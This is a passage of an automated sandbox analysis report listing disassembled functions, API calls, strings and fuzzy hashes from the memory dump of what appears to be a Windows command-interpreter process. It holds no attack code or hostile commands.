                                                                                                                                                                        • API String ID: 777023205-3344945345
                                                                                                                                                                        • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                                                                                        • Instruction ID: f92a2a3c6c57430a1ae8303b5a20e361d6e138e0228fe1d4602cb8270df4d924
                                                                                                                                                                        • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                                                                                        • Instruction Fuzzy Hash: E55157B2E1EA42C5FB149F11A880379B6A0BF89B54F544535D90DC32A2EF3EA44DC70A
                                                                                                                                                                        Function 00007FF6E942F5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6E942E626,?,?,00000000,00007FF6E9431F69), ref: 00007FF6E942F1BA
                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F1E7
                                                                                                                                                                        • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF6E942E626,?,?,00000000,00007FF6E9431F69), ref: 00007FF6E942F1FF
                                                                                                                                                                        • iswdigit.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F2BB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: iswdigit$iswspacewcschr
                                                                                                                                                                        • String ID: )$=,;
                                                                                                                                                                        • API String ID: 1959970872-2167043656
                                                                                                                                                                        • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                                                                                        • Instruction ID: 88679fe057ba9c3d19297643a3e6022470799eb108818e301c355a10f6d6573d
                                                                                                                                                                        • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                                                                                        • Instruction Fuzzy Hash: BB4145A7E08616C6FB684F11995437926A0BF12740FD450B5C989C36A4DF3EA88DCB0E
                                                                                                                                                                        Function 00007FF6E94491B8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsnicmpfprintfwcsrchr
                                                                                                                                                                        • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                        • API String ID: 3625580822-2781220306
                                                                                                                                                                        • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                                                                                        • Instruction ID: 21c09efe3d40ef1412a327d92d5e3f2f2629cd210396b5a0edab7c1bd7de2f67
                                                                                                                                                                        • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                                                                                        • Instruction Fuzzy Hash: 6D31C423A08646D2FA289F52A5003B972A0BF45F94F444534DE1D977D5EF3EE48EC70A
                                                                                                                                                                        Function 00007FF6E9431FAC Relevance: 9.3, APIs: 6, Instructions: 260COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memsetwcsspn
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3809306610-0
                                                                                                                                                                        • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                                                                                        • Instruction ID: 17790d24f6dd9331398309f64bc35e199fc5940d7932a007bd025a2708b69792
                                                                                                                                                                        • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                                                                                        • Instruction Fuzzy Hash: 35B17B73A08A46C2EA50DF35A45437A77A0FF84B84F848031CA4E87795DF7EE849C70A
                                                                                                                                                                        Function 00007FF6E9448C18 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$iswdigit$wcstol
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3841054028-0
                                                                                                                                                                        • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                                                                                        • Instruction ID: cdea29b1fbcaa85e8f6961ee98ddf37bedfc108590ee400aba06ebce432cd6e7
                                                                                                                                                                        • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                                                                                        • Instruction Fuzzy Hash: 73510567A19652C3E7249F15A8102F976A1FF68B50B448231DE5D823D4EF3EE44AC70A
                                                                                                                                                                        Function 00007FF6E9425984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9443687
                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6E942260D), ref: 00007FF6E94436A6
                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6E942260D), ref: 00007FF6E94436EB
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9443703
                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6E942260D), ref: 00007FF6E9443722
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$Write_get_osfhandle$Mode
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1066134489-0
                                                                                                                                                                        • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                                                                                                                        • Instruction ID: e88c57aec55ef78da04ba9b645456917f9a82f17653d9bc3f6a43ac7635f2f28
                                                                                                                                                                        • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                                                                                                                        • Instruction Fuzzy Hash: C2519363B08642D7EB249F21960477AA691FF44B90F088435DE4EC7790EF3EE449CB0A
                                                                                                                                                                        Function 00007FF6E94289C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 850181435-0
                                                                                                                                                                        • Opcode ID: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                                                                                                                                                        • Instruction ID: 9869fed1b54958058e6ae6fa7301d9dbe810692da2740397c7b43acf6dad0e59
                                                                                                                                                                        • Opcode Fuzzy Hash: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                                                                                                                                                        • Instruction Fuzzy Hash: 93411633608AC1CAEB618F60D8443ED77A4FF89B44F454525DA4D8BB48CF39D649C705
                                                                                                                                                                        Function 00007FF6E94334A0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: _get_osfhandle.MSVCRT ref: 00007FF6E9433584
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E943359C
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335C3
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335D9
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335ED
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E9433602
                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E9433514
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9433522
                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E9433541
                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E943355E
                                                                                                                                                                          • Part of subcall function 00007FF6E94336EC: _get_osfhandle.MSVCRT ref: 00007FF6E9433715
                                                                                                                                                                          • Part of subcall function 00007FF6E94336EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6E9433770
                                                                                                                                                                          • Part of subcall function 00007FF6E94336EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9433791
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4057327938-0
                                                                                                                                                                        • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                                                                                        • Instruction ID: 52e4ca84611d64ff1dbf42b2040b49839395a22268cabb8e120f98548edcbe61
                                                                                                                                                                        • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                                                                                        • Instruction Fuzzy Hash: CB315E23A08642C7E7659F75A40427DA6A0AF99B41F884175EE0EC3795DE2EE84CC709
                                                                                                                                                                        Function 00007FF6E944BE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                                                                                                        • String ID: KEYS$LIST$OFF
                                                                                                                                                                        • API String ID: 411561164-4129271751
                                                                                                                                                                        • Opcode ID: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
                                                                                                                                                                        • Instruction ID: fbf71f1edc03e05445253f1ad02dafceac3b3f9c8de1e65fb3b57e9367db9e04
                                                                                                                                                                        • Opcode Fuzzy Hash: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
                                                                                                                                                                        • Instruction Fuzzy Hash: 28219122E08603D1F7549F65A45037922A1FF84790F909231DA1EC32E5EE3ED84DCB0A
                                                                                                                                                                        Function 00007FF6E94301B8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E94301C4
                                                                                                                                                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6E943E904,?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E94301D6
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF6E943E904,?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E9430212
                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6E943E904,?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E9430228
                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF6E943E904,?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E943023C
                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6E943E904,?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E9430251
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 513048808-0
                                                                                                                                                                        • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                                                                                        • Instruction ID: f96d97bab94f2a6004ed90ecc21607ba5b2a9fe47ca1319fd6877e075c3cfc09
                                                                                                                                                                        • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                                                                                        • Instruction Fuzzy Hash: 56219A7391C682C7EB519FB0A9883386B90FF4A754F144335DA0E82690CF7EA84CC70A
                                                                                                                                                                        Function 00007FF6E9433578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9433584
                                                                                                                                                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E943359C
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335C3
                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335D9
                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335ED
                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E9433602
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 513048808-0
                                                                                                                                                                        • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                                                                        • Instruction ID: 6d89b331c714036a7180df0c3f0021553935c5f3d4206415e7aa102b74b4b422
                                                                                                                                                                        • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                                                                        • Instruction Fuzzy Hash: D1115433A08646C6E7248F74A5882786A90FF59B65F549334DD2F827D0DE3ED44CC706
                                                                                                                                                                        Function 00007FF6E9439584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4104442557-0
                                                                                                                                                                        • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                                                                        • Instruction ID: 9378786cca3953a8bd63b0058cb05f6ae3d6f9ca2c5b407d64a02f3d10836d89
                                                                                                                                                                        • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                                                                        • Instruction Fuzzy Hash: 31112122A05B42CBEB00DFB4E8442A833A4FF59758F400A34EA6D87B54EF7DD5A9C345
                                                                                                                                                                        Function 00007FF6E944711C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6E94471F9
